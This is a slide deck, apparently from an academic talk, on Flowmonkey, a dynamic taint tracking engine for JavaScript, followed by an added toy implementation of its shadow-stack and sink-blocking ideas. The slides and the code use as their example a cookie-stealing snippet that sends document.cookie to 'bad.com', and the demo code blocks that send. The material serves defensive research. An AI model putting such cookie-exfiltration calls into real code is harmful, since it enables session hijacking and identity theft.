Flowmonkey: A Fast Dynamic Taint Tracking Engine for JavaScript
Page 1
Flowmonkey: A Fast Dynamic Taint Tracking Engine for JavaScript
Don Jang, UC San Diego
Page 2
Page 3
document.cookie
Cookie Stealing
Identity Theft
Page 4
Password
Credit card #
Browsing history
Page 5
Page 6
Epidemic of Data Stealing JavaScript!
Page 7
How to Detect Data Stealing?
Without Sacrificing Performance?
Page 8
Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work & Conclusion
Page 9
Dynamic Taint Tracking
Tracks where a value goes at runtime
Page 10
Page 11
Dynamic Taint Tracking
1. Tag a value with a taint
2. Propagate taints with the value
3. Block taints from untrusted sinks
Page 12
Example: Cookie Stealing
ck = document.cookie;
data = tmp + ck;
send("bad.com", data);
Page 13
Example: Cookie Stealing
Inject Taints (at confidential sources)
ck = document.cookie;
data = tmp + ck;
send("bad.com", data);
Source: document.cookie
Page 14
Example: Cookie Stealing
Propagate Taints (at assignments, etc.)
ck = document.cookie;
data = tmp + ck;
send("bad.com", data);
Taint propagates: ck, tmp + ck, data
![Page 15: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/15.jpg)
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
Example:Cookie Stealing
Block Taints(At untrusted sinks)
“cr=” + color
send(“bad.com”, data );
Page 16
Dynamic Taint Tracking: Policies
Cookie Protection: cookie ✗ send()
Password Protection: password ✗ send()
General Policy: secret info ✗ expression
Page 17
Dynamic Taint Tracking: JS
Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07
Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
10~100x slowdown
Page 18
Goal: Make It Fast
Page 19
Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work & Conclusion
Page 20
Source code
Interpreter
JIT Engine
Based on JaegerMonkey
Modification: taint tracking logic is augmented
Page 21
Language Extensions: __taint(val, t)
val: a value to be tainted
t: a taint to be used
Page 22
Language Extensions: __taintof(val)
returns the taint of val
Page 23
Language Extensions
var secret = __taint(34349, 1);
tmp = secret * 68;
tmp2 = tmp + "345";
tmp3 = parseInt(tmp2);
alert(__taintof(tmp)); // 1 is printed
Page 24
Implementation: Shadow Stacks
s * 6
push s // s = 5
push 6
mul
Real Stack: 5, 6 → 30
Shadow Stack: s's taint, 6's taint → joined taint
Page 25
Implementation: Shadow Property
a.fld = secret
Object a
Real Properties: fld, …
Shadow Properties: fld's taint, …
Page 26
Hybrid Approach
Interpreter: full-fledged taint tracking
JIT Engine: taint detecting
Page 27
Hybrid Approach
Interpreter: full-fledged taint tracking
JIT Engine: taint detecting
If it doesn't touch a taint: JIT Engine
Page 28
Hybrid Approach
Interpreter: full-fledged taint tracking
JIT Engine: taint detecting
Taint detected!! Do full-fledged taint tracking
Page 29
Hybrid Approach
Rapid prototyping
Fast with few taints
Slow with many taints
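The cookie-stealing example, the __taint/__taintof extensions, the shadow stack and shadow property implementation, and the hybrid fast/slow path from the slides above, worked through in one added example. This is constructed illustration code, not Flowmonkey's own: the TaintVM class, its bitmask taint labels, its fast/slow counters and the cookie value are all assumptions.

```javascript
// Added illustration (not Flowmonkey's code): a toy stack machine with a shadow stack that
// moves in lockstep with the real stack, shadow properties for object fields, and a sink check.
const COOKIE = 1;                              // taint labels are bitmask bits (constructed)
const join = (a, b) => a | b;                  // joined taint = union of both operands' labels

class TaintVM {
  constructor() { this.stack = []; this.shadow = []; this.props = new WeakMap(); this.fast = 0; this.slow = 0; }
  push(v, t = 0) { this.stack.push(v); this.shadow.push(t); }
  pop() { return [this.stack.pop(), this.shadow.pop()]; }
  taint(t) { const [v] = this.pop(); this.push(v, t); }         // models __taint(val, t)
  taintof() { return this.shadow[this.shadow.length - 1]; }    // models __taintof(val)
  // Hybrid idea from the slides: untainted operands take the cheap path and are only
  // counted; any tainted operand takes the full propagation path, joining both taints.
  binop(fn) {
    const [b, tb] = this.pop(); const [a, ta] = this.pop();
    if (ta === 0 && tb === 0) this.fast++; else this.slow++;
    this.push(fn(a, b), join(ta, tb));
  }
  unop(fn) { const [a, ta] = this.pop(); this.push(fn(a), ta); }
  setProp(obj, fld) {                          // a.fld = v: value goes to the real property,
    const [v, t] = this.pop(); obj[fld] = v;   // its taint to the shadow property table
    if (!this.props.has(obj)) this.props.set(obj, {});
    this.props.get(obj)[fld] = t;
  }
  getProp(obj, fld) { this.push(obj[fld], (this.props.get(obj) || {})[fld] || 0); }
  send(host, forbidden) {                      // untrusted sink: refuse forbidden labels
    const [data, t] = this.pop();
    return (t & forbidden) ? { sent: false, host, taint: t } : { sent: true, host, data };
  }
}

// The cookie-stealing program from the slides, run with a constructed cookie value.
function cookieDemo() {
  const vm = new TaintVM(), doc = {};
  vm.push("sid=abc123"); vm.taint(COOKIE); vm.setProp(doc, "cookie"); // source gets tainted
  vm.push("tmp="); vm.getProp(doc, "cookie"); vm.binop((x, y) => x + y); // data = tmp + ck
  const leak = vm.send("bad.com", COOKIE);                                // blocked
  vm.push("cr="); vm.push("blue"); vm.binop((x, y) => x + y);            // "cr=" + color
  const ok = vm.send("bad.com", COOKIE);                                  // untainted, allowed
  return { leak, ok, fast: vm.fast, slow: vm.slow };
}

// The language-extension example from the slides: the taint survives *, + and parseInt.
function extensionDemo() {
  const vm = new TaintVM();
  vm.push(34349); vm.taint(1); vm.push(68); vm.binop((x, y) => x * y);   // tmp = secret * 68
  const tmpTaint = vm.taintof();
  vm.push("345"); vm.binop((x, y) => x + y); vm.unop(parseInt);         // tmp2, tmp3
  return { tmpTaint, tmp3: vm.stack[0], tmp3Taint: vm.taintof() };
}
```

A real engine attaches the shadow slot to every interpreter stack entry and JIT-compiled register, but the two invariants are the same as here: every value has exactly one taint slot, and every operation writes the join of its inputs' taints.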
Page 30
Performance: Baseline
SunSpider
Cookie doesn't flow to 3rd-party code
Page 31
Performance: Cookie Tracking
SunSpider
Cookie doesn't flow to 3rd-party code
Page 32
Demo
Page 33
Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work & Conclusion
Page 34
Future Work
Missing Flows: implicit flows, timing channel, etc.
Empirical Study: to prove the usability of taint tracking
Page 35
Conclusions
A Fast Hybrid Taint Tracking Engine: first JIT-enabled taint tracking engine
Still Many Missing Parts: possible to make it a protection tool? Can we sacrifice some performance?
Page 36
Resources: http://firebird.ucsd.edu/flowmonkey
Page 37
Thank you!